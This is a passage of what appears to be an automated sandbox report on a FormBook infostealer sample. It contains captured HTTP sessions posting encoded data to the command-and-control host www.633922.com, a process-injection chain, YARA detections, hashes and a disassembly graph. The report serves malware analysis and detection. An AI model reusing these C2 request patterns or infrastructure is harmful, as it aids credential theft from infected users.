                                                                                                                      50192.168.2.1149761103.120.80.111802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:20.648746967 CET718OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 52 71 73 46 72 74 58 71 57 49 63 55 34 6f 61 39 77 37 48 2b 4b 77 53 47 41 48 6b 7a 6c 4e 48 45 49 55 35 69 6e 73 73 4c 55 79 62 59 52 71 36 78 41 4e 6d 6e 50 74 4e 5a 77 66 38 5a 6b 6d 52 70 74 35 71 7a 47 4d 43 51 2f 78 42 43 34 54 30 4f 45 30 72 50 55 7a 71 71 37 74 6d 6b 30 69 66 54 54 55 63 6d 66 49 70 44 69 39 31 51 77 4b 33 7a 33 34 6b 44 2b 56 54 55 6c 31 31 4c 64 4b 50 55 33 64 71 77 5a 51 4e 7a 72 56 56 65 48 78 34 30 72 6d 56 4a 34 49 33 48 53 4e 6a 50 48 6b 61 75 74 70 56 78 72 64 35 44 45 2b 57 6e 62 4e 41 35 71 72 59 39 41 45 4b 6f 30 6f 63 4c 63 37 37 57 63 30 2f 6e 43 6c 51 3d
                                                                                                                      Data Ascii: yRV=RqsFrtXqWIcU4oa9w7H+KwSGAHkzlNHEIU5inssLUybYRq6xANmnPtNZwf8ZkmRpt5qzGMCQ/xBC4T0OE0rPUzqq7tmk0ifTTUcmfIpDi91QwK3z34kD+VTUl11LdKPU3dqwZQNzrVVeHx40rmVJ4I3HSNjPHkautpVxrd5DE+WnbNA5qrY9AEKo0ocLc77Wc0/nClQ=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      51192.168.2.1149762103.120.80.111802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:23.548203945 CET1731OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.633922.com
                                                                                                                      Origin: http://www.633922.com
                                                                                                                      Referer: http://www.633922.com/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 52 71 73 46 72 74 58 71 57 49 63 55 34 6f 61 39 77 37 48 2b 4b 77 53 47 41 48 6b 7a 6c 4e 48 45 49 55 35 69 6e 73 73 4c 55 79 54 59 51 62 61 78 41 75 2b 6e 4f 74 4e 5a 7a 66 38 63 6b 6d 52 30 74 35 69 76 47 4d 50 72 2f 7a 4a 43 2b 78 4d 4f 42 42 48 50 65 7a 71 71 79 4e 6d 68 77 69 66 47 54 56 74 75 66 4d 4a 44 69 39 31 51 77 49 76 7a 2b 4a 6b 44 34 56 54 62 74 56 31 50 4d 61 50 77 33 64 69 67 5a 51 5a 4a 71 6c 31 65 47 52 49 30 74 51 70 4a 6e 34 33 2f 52 4e 69 61 48 6b 57 78 74 70 49 49 72 59 46 70 45 39 47 6e 49 37 5a 77 34 59 6c 6b 56 32 7a 63 33 38 38 52 5a 62 61 66 4e 32 6a 44 58 56 74 65 64 77 79 67 7a 4d 73 79 34 56 4e 66 34 35 7a 6f 64 6b 70 50 4b 31 46 64 63 65 4d 49 2b 36 6d 35 59 5a 69 6d 56 57 6f 6b 2f 54 5a 53 77 71 47 54 56 6e 4d 79 4d 56 30 71 6b 65 4d 42 72 68 63 52 38 6b 6d 43 41 4c 73 6d 42 4e 77 78 47 43 54 31 59 4b 39 4e 70 7a 50 5a 4c 6c 59 4f 61 44 6f 5a 2b 48 35 47 4d 31 4c 7a 59 7a 34 76 66 77 2b 47 43 71 33 75 67 5a 45 75 35 37 74 4a 6e 4b 4f 41 33 4c 48 6c 61 63 53 38 46 51 4a 6e 70 53 67 51 67 32 69 75 68 6e 6f 78 56 57 76 57 75 54 58 32 36 67 4f 75 79 6f 57 62 7a 61 57 64 2f 34 61 6c 6e 6b 6d 72 37 75 4d 43 4f 42 4f 45 57 4d 66 39 31 34 41 37 58 64 39 77 54 6f 48 68 67 79 43 62 36 37 76 4a 65 44 49 45 57 72 51 79 39 42 55 2f 4c 31 6c 56 65 4c 70 6b 69 47 79 39 31 6e 65 42 52 6c 56 4c 75 6d 77 69 74 52 76 6d 41 59 6b 65 63 79 48 36 35 35 5a 57 33 75 50 4c 4d 62 37 74 6b 33 48 35 47 71 68 66 7a 66 64 31 37 4f 6b 6d 4b 49 41 38 2b 77 61 56 67 72 61 51 48 54 73 6a 34 71 4c 4e 31 61 67 78 58 78 54 55 66 6c 68 30 67 67 6b 57 42 64 6a 61 32 4a 36 50 53 79 46 65 7a 6a 45 6c 36 58 6d 67 64 50 50 4e 76 76 68 6c 68 56 51 2f 47 38 75 55 49 71 65 39 52 2b 4d 49 64 5a 75 69 79 4d 6c 49 30 76 6f 70 78 53 2b 7a 42 6b 47 4f 66 4d 76 59 44 47 4f 2b 51 38 65 37 36 44 35 52 33 49 73 71 61 6f 75 53 53 33 78 59 6b 52 64 2b 72 72 44 6f 72 35 63 69 56 57 6f 74 77 7a 43 66 59 70 6f 79 4e 59 57 6e 6a 79 50 6b 45 42 46 76 4e 76 32 74 72 4d 68 66 57 77 4e 47 7a 57 58 31 5a 64 64 45 43 31 48 4a 47 38 6e 56 6f 69 47 78 43 59 4f 38 54 65 34 47 79 37 30 2f 56 62 72 35 50 78 50 48 66 51 7a 66 41 65 42 31 71 61 4e 6f 45 43 38 6c 6d 31 77 42 73 62 58 77 35 5a 42 72 4e 48 45 30 32 44 69 55 49 77 59 63 39 6f 79 69 6e 2b 78 48 44 70 53 30 70 49 53 36 66 63 6d 75 50 6b 43 75 56 2b 42 38 4e 55 44 33 70 68 71 71 4b 38 46 49 2b 72 4b 32 6d 56 59 39 71 62 7a 51 52 70 51 31 54 2f 79 36 6d 31 57 57 74 76 78 41 68 36 66 45 2b 4b 4a 46 64 37 69 62 4a 6d 57 50 74 6e 61 34 71 7a 71 30 53 51 35 76 74 71 68 47 61 36 4a 7a 53 4c 75 32 2f 39 7a 6a 31 2b 48 45 41 77 43 59 79 44 42 4b 36 46 69 6e 64 73 4f 57 52 74 47 36 56 6a 35 76 65 53 61 6d 6d 35 65 67 48 7a 58 61 4d 59 2b 51 34 66 78 59 4f 5a 6d 57 6a 67 45 36 4e 66 49 69 33 38 55 37 43 66 2f 4b 78 4c 72 77 62 5a 6d 76 61 46 42 4c 31 49 4a 32 72 32 72 51 64 37 32 6b 72 2f 52 79 4c 37 68 77 62 2f 47 53 58 71 68 6c 38 67 6c 69 79 75 31 6e 70 46 41 63 6e 38 31 55 54 77 61 61 59 48 64 4a 55 4c 56 43 67 58 42 2b 5a 73 66 53 57 5a 35 4e 47 48 6d 35 57 72 72 44 4e 6b 47 4c 30 75 30 73 56 53 39 62 4c 2f 61 57 6e 78 62 2b 52 67 4f 71 31 39 65 65 59 72 6d 78 34 30 56 65 41 2f 58 6e 33 46 66 76 50 6d 71 5a 79 69 73 48 2f 78 33 4f 68 4f 47 4b 30 71 58 44 56 30 31 4d 58 44 35 75 35 72 4c 2b 4d 48 66 48 61 57 59 5a 46 4b 6f 75 64 44 37 55 6f 4c 36 6a 76 31 5a 35 54 68 5a 6e 6f 74 2f 6d 46 54 63 64 36 44 4f 31 51 6e 38 4c 71 6e 6a 42 53 45 55 50 65 61 35 6c 6c 65 53 76 38 64 74 46 76 41 75 43 6f 6b 31 79 42 73 2b 78 4c 6c 74 33 4d 59 6b 38 32 4b 66 6f 33 42 50 4a 4c 6c 78 56 76 72 78 70 45 64 70 73 58 6a 79 2f 37 57 51 78 57 74 65 64 32 38 4d 59 49 77 36 53
                                                                                                                      Data Ascii: yRV=RqsFrtXqWIcU4oa9w7H+KwSGAHkzlNHEIU5inssLUyTYQbaxAu+nOtNZzf8ckmR0t5ivGMPr/zJC+xMOBBHPezqqyNmhwifGTVtufMJDi91QwIvz+JkD4VTbtV1PMaPw3digZQZJql1eGRI0tQpJn43/RNiaHkWxtpIIrYFpE9GnI7Zw4YlkV2zc388RZbafN2jDXVtedwygzMsy4VNf45zodkpPK1FdceMI+6m5YZimVWok/TZSwqGTVnMyMV0qkeMBrhcR8kmCALsmBNwxGCT1YK9NpzPZLlYOaDoZ+H5GM1LzYz4vfw+GCq3ugZEu57tJnKOA3LHlacS8FQJnpSgQg2iuhnoxVWvWuTX26gOuyoWbzaWd/4alnkmr7uMCOBOEWMf914A7Xd9wToHhgyCb67vJeDIEWrQy9BU/L1lVeLpkiGy91neBRlVLumwitRvmAYkecyH655ZW3uPLMb7tk3H5Gqhfzfd17OkmKIA8+waVgraQHTsj4qLN1agxXxTUflh0ggkWBdja2J6PSyFezjEl6XmgdPPNvvhlhVQ/G8uUIqe9R+MIdZuiyMlI0vopxS+zBkGOfMvYDGO+Q8e76D5R3IsqaouSS3xYkRd+rrDor5ciVWotwzCfYpoyNYWnjyPkEBFvNv2trMhfWwNGzWX1ZddEC1HJG8nVoiGxCYO8Te4Gy70/Vbr5PxPHfQzfAeB1qaNoEC8lm1wBsbXw5ZBrNHE02DiUIwYc9oyin+xHDpS0pIS6fcmuPkCuV+B8NUD3phqqK8FI+rK2mVY9qbzQRpQ1T/y6m1WWtvxAh6fE+KJFd7ibJmWPtna4qzq0SQ5vtqhGa6JzSLu2/9zj1+HEAwCYyDBK6FindsOWRtG6Vj5veSamm5egHzXaMY+Q4fxYOZmWjgE6NfIi38U7Cf/KxLrwbZmvaFBL1IJ2r2rQd72kr/RyL7hwb/GSXqhl8gliyu1npFAcn81UTwaaYHdJULVCgXB+ZsfSWZ5NGHm5WrrDNkGL0u0sVS9bL/aWnxb+RgOq19eeYrmx40VeA/Xn3FfvPmqZyisH/x3OhOGK0qXDV01MXD5u5rL+MHfHaWYZFKoudD7UoL6jv1Z5ThZnot/mFTcd6DO1Qn8LqnjBSEUPea5lleSv8dtFvAuCok1yBs+xLlt3MYk82Kfo3BPJLlxVvrxpEdpsXjy/7WQxWted28MYIw6S


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      52192.168.2.1149763103.120.80.111802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:56:26.880600929 CET437OUTGET /m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.633922.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:56:30.082143068 CET1286INHTTP/1.1 200 OK
                                                                                                                      Server: wts/1.7.0
                                                                                                                      Date: Thu, 07 Dec 2023 14:57:35 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      ETag: "65517fce-1a10"
                                                                                                                      Data Raw: 31 61 31 61 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 36 33 33 39 32 32 2e 63 6f 6d 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 36 33 33 39 32 32 2e 63 6f 6d 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 36 33 33 39 32 32 2e 63 6f 6d 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20 20 20 20 20 20 20 20 74 68 2c 0d 0a 20 20 20 20 20 20 20 20 74 64 2c 0d 0a 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2c 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 2c 0d 0a 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 2c 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 61 72 65 61 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 69 63 72 6f 73 6f 66 74 20 59 61 68 65 69 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 20 47 42 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 74 61 68 6f 6d 61 2c 20 61 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 57 65 6e 51 75 61 6e 59 69 20 4d 69 63 72 6f 20 48 65 69 22 2c 20 22 5c 35 42 38 42 5c 34 46 35 33 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: 1a1a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>633922.com-(www.west.cn)</title> <meta name="description" content="633922.com," /> <meta name="keywords" content="633922.com," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; }


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:15:52:18
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\BMhDm7YW62.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:407'137 bytes
                                                                                                                      MD5 hash:67C64609C2542690D1D652D085A8F2BF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:15:52:18
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\okawzsv.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:203'776 bytes
                                                                                                                      MD5 hash:7673BEFD936A20FA9EB874383DEEDBFF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                      • Detection: 65%, ReversingLabs
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:15:52:19
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\okawzsv.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:203'776 bytes
                                                                                                                      MD5 hash:7673BEFD936A20FA9EB874383DEEDBFF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1430436689.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1429827093.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1430474798.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:15:52:27
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3735429878.0000000002B30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:15:52:28
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\typeperf.exe
                                                                                                                      Imagebase:0x830000
                                                                                                                      File size:41'984 bytes
                                                                                                                      MD5 hash:93925D4F55465CFC73C4CDF7F8B1F375
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735194669.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3735067782.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:15:52:40
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3738071578.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:15:52:53
                                                                                                                      Start date:07/12/2023
                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                      Imagebase:0x7ff6de060000
                                                                                                                      File size:676'768 bytes
                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:true

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:15.7%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:22.7%
                                                                                                                        Total number of Nodes:1291
                                                                                                                        Total number of Limit Nodes:24
                                                                                                                        execution_graph 3656 404fc2 3657 404fe3 GetDlgItem GetDlgItem GetDlgItem 3656->3657 3658 40516e 3656->3658 3702 403e89 SendMessageA 3657->3702 3660 405177 GetDlgItem CreateThread CloseHandle 3658->3660 3661 40519f 3658->3661 3660->3661 3663 4051ca 3661->3663 3664 4051b6 ShowWindow ShowWindow 3661->3664 3665 4051ec 3661->3665 3662 405054 3668 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 3662->3668 3666 405228 3663->3666 3670 405201 ShowWindow 3663->3670 3671 4051db 3663->3671 3704 403e89 SendMessageA 3664->3704 3667 403ebb 8 API calls 3665->3667 3666->3665 3677 405233 SendMessageA 3666->3677 3672 4051fa 3667->3672 3675 4050ca 3668->3675 3676 4050ae SendMessageA SendMessageA 3668->3676 3673 405221 3670->3673 3674 405213 3670->3674 3678 403e2d SendMessageA 3671->3678 3680 403e2d SendMessageA 3673->3680 3679 404e84 25 API calls 3674->3679 3681 4050dd 3675->3681 3682 4050cf SendMessageA 3675->3682 3676->3675 3677->3672 3683 40524c CreatePopupMenu 3677->3683 3678->3665 3679->3673 3680->3666 3685 403e54 19 API calls 3681->3685 3682->3681 3684 405bba 18 API calls 3683->3684 3686 40525c AppendMenuA 3684->3686 3687 4050ed 3685->3687 3688 405282 3686->3688 3689 40526f GetWindowRect 3686->3689 3690 4050f6 ShowWindow 3687->3690 3691 40512a GetDlgItem SendMessageA 3687->3691 3692 40528b TrackPopupMenu 3688->3692 3689->3692 3693 405119 3690->3693 3694 40510c ShowWindow 3690->3694 3691->3672 3695 405151 SendMessageA SendMessageA 3691->3695 3692->3672 3696 4052a9 3692->3696 3703 403e89 SendMessageA 3693->3703 3694->3693 3695->3672 3697 